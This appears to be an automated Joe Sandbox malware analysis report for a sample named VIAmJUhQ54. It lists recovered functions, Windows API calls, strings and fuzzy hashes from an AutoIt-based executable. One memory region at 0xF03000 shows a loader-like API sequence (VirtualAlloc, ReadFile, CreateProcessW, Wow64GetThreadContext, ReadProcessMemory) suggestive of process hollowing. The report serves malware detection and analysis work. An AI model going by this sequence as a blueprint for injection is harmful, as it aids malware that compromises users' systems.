                                                                                control_flow_graph 1541 f060f8-f06253 call f03d48 call f05fe8 CreateFileW 1548 f06255 1541->1548 1549 f0625a-f0626a 1541->1549 1550 f0630a-f0630f 1548->1550 1552 f06271-f0628b VirtualAlloc 1549->1552 1553 f0626c 1549->1553 1554 f0628d 1552->1554 1555 f0628f-f062a6 ReadFile 1552->1555 1553->1550 1554->1550 1556 f062a8 1555->1556 1557 f062aa-f062e4 call f06028 call f04fe8 1555->1557 1556->1550 1562 f06300-f06308 ExitProcess 1557->1562 1563 f062e6-f062fb call f06078 1557->1563 1562->1550 1563->1562
                                                                                APIs
                                                                                  • Part of subcall function 00F05FE8: Sleep.KERNELBASE(000001F4), ref: 00F05FF9
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F06249
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1289125454.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_f03000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileSleep
                                                                                • String ID: Y4YCLMIP6HPNYN7PAPR7D2S23K24
                                                                                • API String ID: 2694422964-17462436
                                                                                • Opcode ID: 7459d6d3f5425a2e4af67287083b1aeeeae1e0bb5da00db2b0291b4da35b7758
                                                                                • Instruction ID: a0f6ef738d1999441ad22d3f5f3691df1921c16ef1c7b448c3568048db246c4b
                                                                                • Opcode Fuzzy Hash: 7459d6d3f5425a2e4af67287083b1aeeeae1e0bb5da00db2b0291b4da35b7758
                                                                                • Instruction Fuzzy Hash: B161B470D04288DAEF11D7F4C858BEEBBB8AF15304F044199E249BB2C1C7B90B49DBA5
                                                                                APIs
                                                                                  • Part of subcall function 00725374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007E1148,?,007261FF,?,00000000,00000001,00000000), ref: 00725392
                                                                                  • Part of subcall function 007249FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00724A1D
                                                                                • _wcscat.LIBCMT ref: 00792D80
                                                                                • _wcscat.LIBCMT ref: 00792DB5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$FileModuleNameOpen
                                                                                • String ID: 8!~$\$\Include\
                                                                                • API String ID: 3592542968-693535022
                                                                                • Opcode ID: c4b7f0cd13392e4bec0c68b85b8656eb28821c0767bc524be3ea120039b533e6
                                                                                • Instruction ID: 87bd3a285352686aa06a9835f7fac36cba1d2016466d75bc62c4e4add7dc14f9
                                                                                • Opcode Fuzzy Hash: c4b7f0cd13392e4bec0c68b85b8656eb28821c0767bc524be3ea120039b533e6
                                                                                • Instruction Fuzzy Hash: AB5190B1505388DFC714EF55E8C589AB7F8BE5D300B50852EF24487262EB7C9B0ACB5A
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0072522F
                                                                                • _wcscpy.LIBCMT ref: 00725283
                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00725293
                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00793CB0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                • String ID: Line:
                                                                                • API String ID: 1053898822-1585850449
                                                                                • Opcode ID: 36e90b2d712df720e134057ee1546a9de21d99807c8d6c89af9b963446c44507
                                                                                • Instruction ID: ccd2c28c925bad381dc6cc1a5722cf0fab1c819936050a2f492a81db02e82599
                                                                                • Opcode Fuzzy Hash: 36e90b2d712df720e134057ee1546a9de21d99807c8d6c89af9b963446c44507
                                                                                • Instruction Fuzzy Hash: 0D31D0B1508794EFD321EB60EC4AFDE77E8AB48310F00851EF58586091DB7CA648CB96
                                                                                APIs
                                                                                  • Part of subcall function 007222A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007224F1), ref: 00722303
                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007225A1
                                                                                • CoInitialize.OLE32(00000000), ref: 00722618
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0079503A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID: h$pi
                                                                                • API String ID: 3815369404-720832520
                                                                                • Opcode ID: a6997b0ba27f47b595f6367cfee69b22240efc23dcbc9ad78e708a9c00130dc2
                                                                                • Instruction ID: f7185cec44a7a479967e418b3f2ddc19e2e4975aa89a62c0a2d01c1648e2ebda
                                                                                • Opcode Fuzzy Hash: a6997b0ba27f47b595f6367cfee69b22240efc23dcbc9ad78e708a9c00130dc2
                                                                                • Instruction Fuzzy Hash: BD716AB4A032C58A8714EF6AADD6499BBA8B79D3447C0C16ED209CF7B2DB3C4451CB19
                                                                                APIs
                                                                                  • Part of subcall function 007241A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007239FE,?,00000001), ref: 007241DB
                                                                                • _free.LIBCMT ref: 007936B7
                                                                                • _free.LIBCMT ref: 007936FE
                                                                                  • Part of subcall function 0072C833: __wsplitpath.LIBCMT ref: 0072C93E
                                                                                  • Part of subcall function 0072C833: _wcscpy.LIBCMT ref: 0072C953
                                                                                  • Part of subcall function 0072C833: _wcscat.LIBCMT ref: 0072C968
                                                                                  • Part of subcall function 0072C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0072C978
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                • API String ID: 805182592-1757145024
                                                                                • Opcode ID: 2c158443fa806299fbfffe7005e84ee337c40297ff945974ce614ffb64aec062
                                                                                • Instruction ID: 39a5c8f5add6fe7a023fd60e5fee73a3b83ef363b2777579f9119b1f62be6043
                                                                                • Opcode Fuzzy Hash: 2c158443fa806299fbfffe7005e84ee337c40297ff945974ce614ffb64aec062
                                                                                • Instruction Fuzzy Hash: 38916271910229EFCF04EFA4EC959EDB7B4BF19310F14442AF816AB291DB38AE55CB50
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00793725
                                                                                • GetOpenFileNameW.COMDLG32 ref: 0079376F
                                                                                  • Part of subcall function 0072660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007253B1,?,?,007261FF,?,00000000,00000001,00000000), ref: 0072662F
                                                                                  • Part of subcall function 007240A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007240C6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                                • String ID: X$t3}
                                                                                • API String ID: 3777226403-1748427587
                                                                                • Opcode ID: 0133586db3be972b423af90182337497bf15323871a4d923d2670c4057177a39
                                                                                • Instruction ID: 131256387818e65c135e27269074afe2d9de48c442b580c7d179c2eaed1b3f86
                                                                                • Opcode Fuzzy Hash: 0133586db3be972b423af90182337497bf15323871a4d923d2670c4057177a39
                                                                                • Instruction Fuzzy Hash: BA21A571A101A8DFCF11DFD4D8497EE7BF89F89304F10806AE505AB241DBBC5A898F65
                                                                                APIs
                                                                                • __getstream.LIBCMT ref: 007434FE
                                                                                  • Part of subcall function 00747C0E: __getptd_noexit.LIBCMT ref: 00747C0E
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00743539
                                                                                • __wopenfile.LIBCMT ref: 00743549
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                • String ID: <G
                                                                                • API String ID: 1820251861-2138716496
                                                                                • Opcode ID: 7379d4b2ccbef239ba738a05b7804f2156c92c042e4d8e1b20fb93d37c6b1fa3
                                                                                • Instruction ID: 3878ba68f95b63c89f7c57c1964fc2f319bf69d645bf353d4f6876a20f2e4199
                                                                                • Opcode Fuzzy Hash: 7379d4b2ccbef239ba738a05b7804f2156c92c042e4d8e1b20fb93d37c6b1fa3
                                                                                • Instruction Fuzzy Hash: B311CA70A00216DBDB51BFB88C466BE76A4BF45360B158525F41DD7281EB3CCA11D7B1
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0073D28B,SwapMouseButtons,00000004,?), ref: 0073D2BC
                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0073D28B,SwapMouseButtons,00000004,?,?,?,?,0073C865), ref: 0073D2DD
                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,0073D28B,SwapMouseButtons,00000004,?,?,?,?,0073C865), ref: 0073D2FF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: Control Panel\Mouse
                                                                                • API String ID: 3677997916-824357125
                                                                                • Opcode ID: 0df2080c780e3035e2ffedd6a6d9d1fb74be8eee9dd3a13bf10a423442a41374
                                                                                • Instruction ID: a441e49ac5579f04bd5a021f7a26e547f2d96f6513cd182d21d26967ebcaa203
                                                                                • Opcode Fuzzy Hash: 0df2080c780e3035e2ffedd6a6d9d1fb74be8eee9dd3a13bf10a423442a41374
                                                                                • Instruction Fuzzy Hash: 42114575611208FFEB208FA4E884EAF7BB8EF45740F008429A902D7210E735AE409B64
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 00F05815
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F05839
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F0585B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1289125454.0000000000F03000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F03000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_f03000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                • Instruction ID: 914a28af5f33d1c3bf54c4341ff0f936ded6d15043f64a4d6f2e1d5ee71762e7
                                                                                • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                                • Instruction Fuzzy Hash: EC62F870A14618DAEB24CFA4C841BDEB376EF58700F1091A9D10DEB2D0E7B99E81DF59
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 3877424927-0
                                                                                • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                • Instruction ID: 28583286f9d478529b54b01d4721453f88f55e457a33963f1815017573e5041f
                                                                                • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                • Instruction Fuzzy Hash: E451C2B0A00206EBDB299FA988C566E77B5AF40320F258729F87D962D0D7789F50CF51
                                                                                APIs
                                                                                  • Part of subcall function 00724517: _fseek.LIBCMT ref: 0072452F
                                                                                  • Part of subcall function 0076C56D: _wcscmp.LIBCMT ref: 0076C65D
                                                                                  • Part of subcall function 0076C56D: _wcscmp.LIBCMT ref: 0076C670
                                                                                • _free.LIBCMT ref: 0076C4DD
                                                                                • _free.LIBCMT ref: 0076C4E4
                                                                                • _free.LIBCMT ref: 0076C54F
                                                                                  • Part of subcall function 00741C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00747A85), ref: 00741CB1
                                                                                  • Part of subcall function 00741C9D: GetLastError.KERNEL32(00000000,?,00747A85), ref: 00741CC3
                                                                                • _free.LIBCMT ref: 0076C557
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                • String ID:
                                                                                • API String ID: 1552873950-0
                                                                                • Opcode ID: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
                                                                                • Instruction ID: 17bee15c5ba226156160a7390f34472bc6270976dc104acf5d2ebaa8151fe50c
                                                                                • Opcode Fuzzy Hash: ba9d9782be527324384c8c78457c06db785866cb2d39da853ac3465622bcb420
                                                                                • Instruction Fuzzy Hash: 3C518DB1A04258EFDF159F64DC85BADBBB9EF48300F1000AEF649E3241DB755A908F58
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0073EBB2
                                                                                  • Part of subcall function 007251AF: _memset.LIBCMT ref: 0072522F
                                                                                  • Part of subcall function 007251AF: _wcscpy.LIBCMT ref: 00725283
                                                                                  • Part of subcall function 007251AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00725293
                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 0073EC07
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0073EC16
                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00793C88
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                • String ID:
                                                                                • API String ID: 1378193009-0
                                                                                • Opcode ID: 9499ebabf8fa2a97ece2eee08a09b222b24a9b9930ceecb0c829dad3468d23db
                                                                                • Instruction ID: 8ba4b031cb756f93dc44220e7092e288bc3a8a54bf2fb484c15ee5facd3d83cd
                                                                                • Opcode Fuzzy Hash: 9499ebabf8fa2a97ece2eee08a09b222b24a9b9930ceecb0c829dad3468d23db
                                                                                • Instruction Fuzzy Hash: 8321AD715047949FFB3297249859BEBBBEC9B46304F04044DD69B562C2C3786E84CB65
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 0076C72F
                                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0076C746
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$FileNamePath
                                                                                • String ID: aut
                                                                                • API String ID: 3285503233-3010740371
                                                                                • Opcode ID: 41682d7ff6c0dcc1b0bebf7fdb61e83ca4961be6f726574c48432cf52b7cab92
                                                                                • Instruction ID: 9dcbe778ebe4ed01125c75ad4b16d8a42ff399b74891716ddf622bff2c576098
                                                                                • Opcode Fuzzy Hash: 41682d7ff6c0dcc1b0bebf7fdb61e83ca4961be6f726574c48432cf52b7cab92
                                                                                • Instruction Fuzzy Hash: CAD05E7550030EABDB20AB90DC0EFCA777CA700708F0041A17651A50F1DAF8EA99CB69
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3365cf7cb5b71c8ebdd15389da44ad6db2b4e985c355201ccc465596f41953d7
                                                                                • Instruction ID: fe40450bce868700dfc2f7489037b66a4cb29649329ff56135ab0165a3dde2b4
                                                                                • Opcode Fuzzy Hash: 3365cf7cb5b71c8ebdd15389da44ad6db2b4e985c355201ccc465596f41953d7
                                                                                • Instruction Fuzzy Hash: D4F15971608301DFCB10DF24C995B6AB7E5FF88314F14892EF9999B292D738E945CB82
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00725022
                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007250CB
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell__memset
                                                                                • String ID:
                                                                                • API String ID: 928536360-0
                                                                                • Opcode ID: b2ff653fff4034841aaedcf3420b6cfc9955765c59658cd48c491b66d558b345
                                                                                • Instruction ID: 044795a0fc821f76bbb6ff3db347c210cf286ecb165fa9c15028cd9f97dc8a07
                                                                                • Opcode Fuzzy Hash: b2ff653fff4034841aaedcf3420b6cfc9955765c59658cd48c491b66d558b345
                                                                                • Instruction Fuzzy Hash: CA31AEB0605751CFC731DF34E88569BBBE4FF49304F00492EE69A87250E779A944CBA6
                                                                                APIs
                                                                                • __FF_MSGBANNER.LIBCMT ref: 00743973
                                                                                  • Part of subcall function 007481C2: __NMSG_WRITE.LIBCMT ref: 007481E9
                                                                                  • Part of subcall function 007481C2: __NMSG_WRITE.LIBCMT ref: 007481F3
                                                                                • __NMSG_WRITE.LIBCMT ref: 0074397A
                                                                                  • Part of subcall function 0074821F: GetModuleFileNameW.KERNEL32(00000000,007E0312,00000104,00000000,00000001,00000000), ref: 007482B1
                                                                                  • Part of subcall function 0074821F: ___crtMessageBoxW.LIBCMT ref: 0074835F
                                                                                  • Part of subcall function 00741145: ___crtCorExitProcess.LIBCMT ref: 0074114B
                                                                                  • Part of subcall function 00741145: ExitProcess.KERNEL32 ref: 00741154
                                                                                  • Part of subcall function 00747C0E: __getptd_noexit.LIBCMT ref: 00747C0E
                                                                                • RtlAllocateHeap.NTDLL(00D60000,00000000,00000001,00000001,00000000,?,?,0073F507,?,0000000E), ref: 0074399F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 1372826849-0
                                                                                • Opcode ID: 8d74664c31db072605b17a06b42ea90968bb3727bb59f9bdfbfb3ea10be7d311
                                                                                • Instruction ID: d7b87000c4d1d8dd285b734cbdf277d2bae81a3e56512cc2b45af58d32298ce2
                                                                                • Opcode Fuzzy Hash: 8d74664c31db072605b17a06b42ea90968bb3727bb59f9bdfbfb3ea10be7d311
                                                                                • Instruction Fuzzy Hash: A501B531345245DAE6253B78DC8AA2E334C9F82768F21412AF50D9B2C2DFFCBD4086A5
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0076C385,?,?,?,?,?,00000004), ref: 0076C6F2
